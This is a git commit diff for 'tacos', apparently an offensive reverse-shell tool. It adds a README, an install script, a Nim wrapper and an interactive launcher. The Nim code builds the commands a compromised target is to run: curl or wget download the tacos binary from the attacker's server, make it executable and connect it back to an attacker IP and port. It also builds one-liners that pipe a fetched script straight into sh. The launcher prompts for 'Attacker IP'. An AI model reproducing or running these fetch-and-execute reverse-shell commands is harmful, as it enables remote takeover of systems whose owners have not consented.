Add wget support by wrapper + wrap docs

wrap/README.md

@@ -0,0 +1,22 @@
+## Set up...
+
+* Requirements: [`gum`](https://github.com/charmbracelet/gum#installation), `nim`, `go`, `git`, ètmux`
+* Install all the stuff: `./install-wrap.sh`
+
+## ... Have fun!
+
+Just launch listener and take a seat 💺
+
+```shell
+tacos.lister
+```
+
+## Additional notes
+
+Some `wrap` flags are not used by the helper script (`tacos.listener`):
+* `--no-shortcut`: disable /sh endpoint of gitar (use longer command)
+* `--custom-sh-command`: provide custom command to be returned by /sh endpoint (executed by target)
+* `--custom-remote-command`: provide custom command to be executed on target
+* `--window`: target windows machine
+
+Also `tacos` binary must fit with the target architecture. By default, the `wrap` takes the one within `$HOME/.local/bin` which is surely a linux one. For other architecture build another tacos binary and put it in the current directory.

wrap/install-wrap.sh

@@ -0,0 +1,23 @@
+#!/usr/bin/env bash
+
+# build tacos statically-linked binary
+mkdir -p $HOME/.local/bin
+git clone https://github.com/ariary/tacos.git && cd tacos
+go mod tidy
+make before.build
+make build.tacos.static && mv tacos $HOME/.local/bin/
+mkdir -p $HOME/.tacos
+
+# copy tacos forker templates
+mv light-pty4all/socat-forker-windows.sh.tpl $HOME/.tacos/
+mv light-pty4all/socat-forker.sh.tpl $HOME/.tacos/
+
+# install wrapper
+nimble install cligen && make build.wrap && mv wrap/bin/wrap $HOME/.local/bin/
+
+# "Wrap the wrap" ~ install helper script to ease wrapper call
+cp ./tacos.listener $HOME/.local/bin
+echo "Ensure ${HOME}/.local/bin is in your \$PATH"
+
+# clean
+cd .. && rm -rf tacos

wrap/src/wrap.nim

@@ -34,6 +34,74 @@ proc cleanup():void =
  removeFile("tacos")
  #removeFile(getAppFilename()) # not needed if wrap in path
 
+# Return the command line return by th /sh endpoint (use curl)
+proc remoteCurlShCommand(downloadUrl,tunnelEndpoint,shutdownUrl,binary,secret,script,lhost:string,lport,webport:int,windows,tmp,gitar:bool):string =
+ var remoteCmd: string
+
+ if windows:
+ if tunnelEndpoint != "":
+ remoteCmd=fmt"curl -O {downloadUrl} && curl {shutdownUrl} && .\\{binary} {tunnelEndpoint}"
+ else:
+ remoteCmd=fmt"curl -O {downloadUrl} && .\\{binary} {lhost}:{lport}"
+ else:
+ if tunnelEndpoint != "":
+ remoteCmd=fmt"curl -s -O {downloadUrl} && curl {shutdownUrl} && chmod +x {binary} && ./{binary} {tunnelEndpoint}"
+ if tmp:
+ remoteCmd=fmt"mkdir -p /tmp/tacos && curl -s -o /tmp/tacos/{binary} {downloadUrl} && curl {shutdownUrl} && chmod +x /tmp/tacos/{binary} && /tmp/tacos/{binary} {tunnelEndpoint}"
+ else:
+ remoteCmd=fmt"curl -s -O {downloadUrl} && chmod +x {binary} && ./{binary} {lhost}:{lport}"
+ if tmp:
+ remoteCmd=fmt"mkdir -p /tmp/tacos && curl -s -o /tmp/tacos/{binary} {downloadUrl} && chmod +x /tmp/tacos/{binary} && /tmp/tacos/{binary} {lhost}:{lport}"
+
+
+ ## Inject prepared-command within reverse shell
+ if tunnelEndpoint == "":
+ if not windows and gitar:
+ styledEcho(fgGreen,"[+] ",fgDefault,"Load gitar shortcut in reverse shell")
+ discard execCmd(fmt"sed -i 's/GITAR_SECRET/{secret}/g' {script}")
+ discard execCmd(fmt"sed -i 's/GITAR_PORT/{webport}/g' {script}")
+ discard execCmd(fmt"sed -i 's/GITAR_HOST/{lhost}/g' {script}")
+ else:
+ discard execCmd(fmt"sed -i '/GITAR_SECRET/d' {script}")
+ return remoteCmd
+
+# Return the command line to execute on target (use curl)
+proc remoteCurlCommand(shortcutUrl:string):string=
+ var remoteCmd :string
+ remoteCmd ="\nsh -c \"$(curl " & shortcutUrl & ")\"\nsh <(curl " & fmt"{shortcutUrl}" & ")\n" & fmt"curl {shortcutUrl}" & "|sh\n" #Could be cleaner
+ return remoteCmd
+
+# Return the command line return by th /sh endpoint (use curl)
+proc remoteWgetShCommand(downloadUrl,tunnelEndpoint,shutdownUrl,binary,secret,script,lhost:string,lport,webport:int,tmp,gitar:bool):string =
+ var remoteCmd: string
+
+ if tunnelEndpoint != "":
+ remoteCmd=fmt"wget -q {downloadUrl} && wget -O - {shutdownUrl} && chmod +x {binary} && ./{binary} {tunnelEndpoint}"
+ if tmp:
+ remoteCmd=fmt"mkdir -p /tmp/tacos && wget -q -O /tmp/tacos/{binary} {downloadUrl} && wget -O - {shutdownUrl} && chmod +x /tmp/tacos/{binary} && /tmp/tacos/{binary} {tunnelEndpoint}"
+ else:
+ remoteCmd=fmt"wget -q {downloadUrl} && chmod +x {binary} && ./{binary} {lhost}:{lport}"
+ if tmp:
+ remoteCmd=fmt"mkdir -p /tmp/tacos && wget -q -O /tmp/tacos/{binary} {downloadUrl} && chmod +x /tmp/tacos/{binary} && /tmp/tacos/{binary} {lhost}:{lport}"
+
+
+ ## Inject prepared-command within reverse shell
+ if tunnelEndpoint == "":
+ if gitar:
+ styledEcho(fgGreen,"[+] ",fgDefault,"Load gitar shortcut in reverse shell")
+ discard execCmd(fmt"sed -i 's/GITAR_SECRET/{secret}/g' {script}")
+ discard execCmd(fmt"sed -i 's/GITAR_PORT/{webport}/g' {script}")
+ discard execCmd(fmt"sed -i 's/GITAR_HOST/{lhost}/g' {script}")
+ else:
+ discard execCmd(fmt"sed -i '/GITAR_SECRET/d' {script}")
+ return remoteCmd
+
+# Return the command line to execute on target (use curl)
+proc remoteWgetCommand(shortcutUrl:string):string=
+ var remoteCmd :string
+ remoteCmd ="\nsh -c \"$(wget -q -O - " & shortcutUrl & ")\"\nsh <(wget -q -O - " & fmt"{shortcutUrl}" & ")\n" & fmt"wget -q -O - {shortcutUrl}" & "|sh\n" #Could be cleaner
+ return remoteCmd
+
 proc Wrap(
  bore = false, 
  ngrok = false,
@@ -43,7 +111,8 @@ proc Wrap(
  gitar = true,
  windows=false,
  tmp=false,
- noShortcut=false
+ wget=false,
+ noShortcut=false,
  ): void =
  try:
  ## Ease the launch of socat listener waiting for tacos interactive reverse shell
@@ -63,10 +132,19 @@ proc Wrap(
  if (bore or ngrok) and lhost!="":
  styledEcho("⚠️ ",fgYellow,"--lhost has been filled but will not be used with --ngrok or --bore flags")
  quit(QuitFailure)
+
+ if (bore or ngrok) and not gitar:
+ styledEcho("Missing flag ",fgRed,"--ngrok or --bore must be used with --gitar")
+ quit(QuitFailure)
 
  if not bore and not ngrok and lhost=="":
  styledEcho("Missing params: ",fgRed,"--lhost is missing (or --ngrok, or --bore)")
  quit(QuitFailure)
+
+
+ if wget and windows:
+ styledEcho("Not yet implemented ",fgRed,"--wget and --windows")
+ quit(QuitFailure)
 
  ## Tmux
  if not existsEnv("TMUX"):
@@ -161,41 +239,21 @@ proc Wrap(
 
  ## Message output
  styledEcho(fgGreen,"[+] ",fgDefault,"Copy/paste following command on target and enjoy your meal 🌮:")
- var remoteCmd: string
  var downloadUrl = fmt"{url}/pull/{binary}"
  var shutdownUrl = fmt"{url}/shutdown"
-
- if windows:
- if tunnelEndpoint != "":
- remoteCmd=fmt"curl -O {downloadUrl} && curl {shutdownUrl} && .\\{binary} {tunnelEndpoint}"
- else:
- remoteCmd=fmt"curl -O {downloadUrl} && .\\{binary} {lhost}:{lport}"
+ var remoteCmd:string
+ if wget:
+ remoteCmd = remoteWgetShCommand(downloadUrl,tunnelEndpoint,shutdownUrl,binary,secret,script,lhost,lport,webport,tmp,gitar)
  else:
- if tunnelEndpoint != "":
- remoteCmd=fmt"curl -s -O {downloadUrl} && curl {shutdownUrl} && chmod +x {binary} && ./{binary} {tunnelEndpoint}"
- if tmp:
- remoteCmd=fmt"mkdir -p /tmp/tacos && curl -s -o /tmp/tacos/{binary} {downloadUrl} && curl {shutdownUrl} && chmod +x /tmp/tacos/{binary} && /tmp/tacos/{binary} {tunnelEndpoint}"
- else:
- remoteCmd=fmt"curl -s -O {downloadUrl} && chmod +x {binary} && ./{binary} {lhost}:{lport}"
- if tmp:
- remoteCmd=fmt"mkdir -p /tmp/tacos && curl -s -o /tmp/tacos/{binary} {downloadUrl} && chmod +x /tmp/tacos/{binary} && /tmp/tacos/{binary} {lhost}:{lport}"
-
-
- ## Inject prepared-command within reverse shell
- if tunnelEndpoint == "":
- if not windows and gitar:
- styledEcho(fgGreen,"[+] ",fgDefault,"Load gitar shortcut in reverse shell")
- discard execCmd(fmt"sed -i 's/GITAR_SECRET/{secret}/g' {script}")
- discard execCmd(fmt"sed -i 's/GITAR_PORT/{webport}/g' {script}")
- discard execCmd(fmt"sed -i 's/GITAR_HOST/{lhost}/g' {script}")
- else:
- discard execCmd(fmt"sed -i '/GITAR_SECRET/d' {script}")
-
+ remoteCmd = remoteCurlShCommand(downloadUrl,tunnelEndpoint,shutdownUrl,binary,secret,script,lhost,lport,webport,windows,tmp,gitar)
  ## With shorter shortcut
  if not noShortcut:
  writeFile("sh", remoteCmd)
  let shortcutUrl = fmt"{url}/pull/sh"
- remoteCmd = "\nsh -c \"$(curl " & shortcutUrl & ")\"\nsh <(curl " & fmt"{shortcutUrl}" & ")\n" & fmt"curl {shortcutUrl}" & "|sh\n" #Cuuld be cleaner
+ if wget:
+ remoteCmd = remoteWgetCommand(shortcutUrl)
+ else:
+ remoteCmd = remoteCurlCommand(shortcutUrl)
 
  echo ""
 
@@ -219,5 +277,7 @@ when isMainModule:
  "gitar": "use gitar as web server (also enable gitar shortcut on remote). Python server is used otherwise",
  "windows": "target windows machine",
  "tmp": "if RCE is not in a writable repository, store tacos in /tmp/tacos (only for linux)",
+ "wget": "use wget instead on target",
  "no-shortcut": "disable /sh endpoint of gitar (use longer command)",
- }
+ }
+

wrap/tacos.listener

@@ -0,0 +1,29 @@
+#!/usr/bin/env bash
+
+FLAGS=""
+
+EXPOSITION=$(gum choose "use IP" "tunnel: ngrok" "tunnel: bore")
+if [ "$EXPOSITION" = "use IP" ]; then
+ IP=$(gum input --placeholder "Enter Attacker IP")
+ FLAGS="${FLAGS} --lhost ${IP}"
+elif [ "$IP_CHOICE" = "tunnel: bore" ]; then
+ FLAGS="${FLAGS} -b"
+else
+ FLAGS="${FLAGS} -n"
+fi
+
+TMP=""
+gum confirm "Shell from /tmp directory ?" && FLAGS="${FLAGS} --tmp"
+
+if [ ! -f "tacos" ]; then
+ cp $HOME/.local/bin/tacos .
+fi
+
+CURL_OR_WGET=$(gum choose "use curl" "use wget")
+if [ "$CURL_OR_WGET" = "use curl" ]; then
+ FLAGS="${FLAGS}" #nothing
+elif [ "$CURL_OR_WGET" = "use wget" ]; then
+ FLAGS="${FLAGS} --wget"
+fi
+
+tmux new-session -s tacos "wrap ${FLAGS}"